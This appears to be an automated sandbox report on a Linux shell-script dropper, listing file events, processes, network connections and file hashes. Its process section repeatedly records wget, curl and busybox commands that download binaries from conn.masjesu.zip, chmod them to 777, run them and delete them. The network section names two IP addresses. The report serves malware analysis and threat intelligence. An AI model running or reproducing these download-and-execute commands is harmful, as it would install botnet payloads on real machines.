File opened for modification /tmp/7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY /usr/bin/curl N/A
File opened for modification /tmp/RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9 /usr/bin/curl N/A
File opened for modification /tmp/ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA /usr/bin/curl N/A
File opened for modification /tmp/bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt /usr/bin/curl N/A
File opened for modification /tmp/aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH /usr/bin/curl N/A
File opened for modification /tmp/fzrlbYps2nqFvvjas15z491HAe4CKgOzS1 /usr/bin/curl N/A
File opened for modification /tmp/fzrlbYps2nqFvvjas15z491HAe4CKgOzS1 /usr/bin/curl N/A

Processes

/tmp/c72566effcf8e8f78e34277ced9f0394f5385a070dae6ae2155d3a0d8b9a5694.sh

[/tmp/c72566effcf8e8f78e34277ced9f0394f5385a070dae6ae2155d3a0d8b9a5694.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj]

/bin/chmod

[chmod 777 FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj]

/tmp/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj

[./FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj]

/bin/rm

[rm FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt]

/bin/chmod

[chmod 777 bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt]

/tmp/bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt

[./bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt]

/bin/rm

[rm bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ]

/bin/chmod

[chmod 777 hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ]

/tmp/hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ

[./hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ]

/bin/rm

[rm hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA]

/bin/chmod

[chmod 777 ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA]

/tmp/ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA

[./ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA]

/bin/rm

[rm ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2]

/bin/chmod

[chmod 777 kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2]

/tmp/kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2

[./kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2]

/bin/rm

[rm kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D]

/bin/chmod

[chmod 777 rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D]

/tmp/rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D

[./rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D]

/bin/rm

[rm rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9]

/bin/chmod

[chmod 777 RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9]

/tmp/RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9

[./RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9]

/bin/rm

[rm RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I]

/bin/chmod

[chmod 777 3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I]

/tmp/3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I

[./3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I]

/bin/rm

[rm 3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH]

/bin/chmod

[chmod 777 aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH]

/tmp/aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH

[./aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH]

/bin/rm

[rm aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/4leDefszXI2RZNKHInEoyhoHCwXumwUZoc]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/4leDefszXI2RZNKHInEoyhoHCwXumwUZoc]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/4leDefszXI2RZNKHInEoyhoHCwXumwUZoc]

/bin/chmod

[chmod 777 4leDefszXI2RZNKHInEoyhoHCwXumwUZoc]

/tmp/4leDefszXI2RZNKHInEoyhoHCwXumwUZoc

[./4leDefszXI2RZNKHInEoyhoHCwXumwUZoc]

/bin/rm

[rm 4leDefszXI2RZNKHInEoyhoHCwXumwUZoc]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/fzrlbYps2nqFvvjas15z491HAe4CKgOzS1]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/fzrlbYps2nqFvvjas15z491HAe4CKgOzS1]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/fzrlbYps2nqFvvjas15z491HAe4CKgOzS1]

/bin/chmod

[chmod 777 fzrlbYps2nqFvvjas15z491HAe4CKgOzS1]

/tmp/fzrlbYps2nqFvvjas15z491HAe4CKgOzS1

[./fzrlbYps2nqFvvjas15z491HAe4CKgOzS1]

/bin/rm

[rm fzrlbYps2nqFvvjas15z491HAe4CKgOzS1]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs]

/bin/chmod

[chmod 777 D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs]

/tmp/D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs

[./D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs]

/bin/rm

[rm D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY]

/bin/chmod

[chmod 777 7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY]

/tmp/7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY

[./7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY]

/bin/rm

[rm 7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y]

/bin/chmod

[chmod 777 sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y]

/tmp/sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y

[./sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y]

/bin/rm

[rm sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs]

/bin/chmod

[chmod 777 D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs]

/tmp/D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs

[./D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs]

/bin/rm

[rm D0aTsyKQrHRdtb9cGY3JuDmgbZD4LPSxxs]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY]

/bin/chmod

[chmod 777 7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY]

/tmp/7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY

[./7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY]

/bin/rm

[rm 7WLz925j2OwzrpXmz25R6Gws1kEGoCUJyY]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y]

/bin/chmod

[chmod 777 sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y]

/tmp/sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y

[./sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y]

/bin/rm

[rm sxRsbo8SvqVVQiLvZvQdHYIKdnM1HA2e0Y]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/fzrlbYps2nqFvvjas15z491HAe4CKgOzS1]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/fzrlbYps2nqFvvjas15z491HAe4CKgOzS1]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/fzrlbYps2nqFvvjas15z491HAe4CKgOzS1]

/bin/chmod

[chmod 777 fzrlbYps2nqFvvjas15z491HAe4CKgOzS1]

/tmp/fzrlbYps2nqFvvjas15z491HAe4CKgOzS1

[./fzrlbYps2nqFvvjas15z491HAe4CKgOzS1]

/bin/rm

[rm fzrlbYps2nqFvvjas15z491HAe4CKgOzS1]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj]

/bin/chmod

[chmod 777 FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj]

/tmp/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj

[./FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj]

/bin/rm

[rm FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt]

/bin/chmod

[chmod 777 bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt]

/tmp/bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt

[./bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt]

/bin/rm

[rm bjyH4WNfxFs560wb44W3edEsjsi4qRFHVt]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ]

/bin/chmod

[chmod 777 hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ]

/tmp/hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ

[./hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ]

/bin/rm

[rm hrMjPn9eukOJvGg2U1sz4VAY9Z29EOTKbZ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D]

/bin/chmod

[chmod 777 rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D]

/tmp/rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D

[./rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D]

/bin/rm

[rm rgGh75uaODH2uqq5Vn0uYjwC70QTOD5L9D]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9]

/bin/chmod

[chmod 777 RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9]

/tmp/RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9

[./RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9]

/bin/rm

[rm RMAIjq3iTveGOec3WYMs1FmS6V6EjiYvG9]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I]

/bin/chmod

[chmod 777 3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I]

/tmp/3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I

[./3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I]

/bin/rm

[rm 3bRTt2vHqwXaxvfxLHIVttBVvla0bmRC3I]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA]

/bin/chmod

[chmod 777 ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA]

/tmp/ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA

[./ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA]

/bin/rm

[rm ykbJLB3Gi3gFZb1ER3qnukxroguH5fL2pA]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2]

/bin/chmod

[chmod 777 kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2]

/tmp/kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2

[./kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2]

/bin/rm

[rm kOcgg0qPAdT8PDI88Uk2dKO8tTpFSTkDx2]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH]

/bin/chmod

[chmod 777 aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH]

/tmp/aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH

[./aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH]

/bin/rm

[rm aHoxQyTVSQ9jpnwWEgZMXPcdbOAtS8RjPH]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/4leDefszXI2RZNKHInEoyhoHCwXumwUZoc]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/4leDefszXI2RZNKHInEoyhoHCwXumwUZoc]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

/tmp/FbxlFHL3zcxdU97Tt56cc7p3iI6x4W6jAj

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97